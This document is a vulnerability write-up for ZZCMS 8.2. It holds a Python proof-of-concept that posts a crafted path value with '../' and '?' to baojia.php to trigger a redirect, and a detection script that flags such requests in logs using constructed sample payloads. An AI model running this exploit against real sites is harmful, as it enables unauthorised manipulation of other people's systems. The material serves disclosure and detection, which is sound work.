Directory traversal POC

To reproduce the vulnerability, deploy the affected environment locally. Project download address:
http://www.zzcms.net/zx/show-167.htm

import os
import re

import requests

# Enter the path you want to jump to from the current directory.
# For example: to jump to the root directory from http://localhost/zzcms8.2, type in ../
print('Please enter the path you want to jump from the current directory.\nFor example: if you want to jump to the root directory from http://localhost/zzcms8.2, then you can type in ../')
dir_input = input('input:')


def poc():
    payload = {'action': 'search', 'lb': dir_input + '?'}
    # This is my local environment
    r = requests.post('http://localhost/zzcms8.2/baojia/baojia.php', data=payload)
    if r.content:
        print(r.content)
        reg = r'(<script>location\.href=.*keyword=.*</script>)'
        response = r.content.decode('utf-8')
        # re.search finds the script tag on any line of the response;
        # re.match only looked at the start and crashed on no match.
        result = re.search(reg, response)
        if result is None:
            print('\nNo redirect script found in the response.')
        else:
            print('\nNow the browser executes the following javascript script when loading the page:')
            print(result.group(1))
            print('The first question mark is truncated, so the browser will jump to the http://localhost/zzcms8.2/baojia/baojia.php' + dir_input)
    else:
        print('unknown mistake')
    # "pause" is a Windows-only command
    if os.name == 'nt':
        os.system("pause")


poc()
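
On the detection side, the request this PoC sends (a POST to baojia/baojia.php with action=search and an lb value carrying ../ and a ?) can be searched for in request logs. The following is an added example, not code from the original post or from ZZCMS; the record layout (method, path, URL-encoded body), the function names and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, unquote

TARGET_SUFFIX = "/baojia/baojia.php"  # endpoint named in the PoC above


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .), bounded rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_lb(value):
    """Return the reasons an `lb` value matches the PoC's payload shape."""
    value = fully_decode(value).replace("\\", "/")
    reasons = []
    if ".." in value.split("/"):
        reasons.append("dot-dot path segment")
    if "?" in value:
        reasons.append("embedded '?'")
    return reasons


def flag_requests(records):
    """records: (method, path, urlencoded_body) tuples; returns the hits."""
    hits = []
    for method, path, body in records:
        if method.upper() != "POST" or not path.split("?")[0].endswith(TARGET_SUFFIX):
            continue
        form = parse_qs(body, keep_blank_values=True)
        if "search" not in form.get("action", []):
            continue
        for lb in form.get("lb", []):
            if (reasons := suspicious_lb(lb)):
                hits.append((path, lb, reasons))
    return hits


# Constructed sample requests (not captured traffic).
SAMPLE = [
    ("POST", "/zzcms8.2/baojia/baojia.php", "action=search&lb=..%2F%3F"),
    ("POST", "/zzcms8.2/baojia/baojia.php", "action=search&lb=%252e%252e%252f%253f"),
    ("POST", "/zzcms8.2/baojia/baojia.php", "action=search&lb=steel"),
]

print(flag_requests(SAMPLE))
```

A legitimate lb value containing a literal ? would also be flagged, so hits are leads to review, not confirmed exploitation.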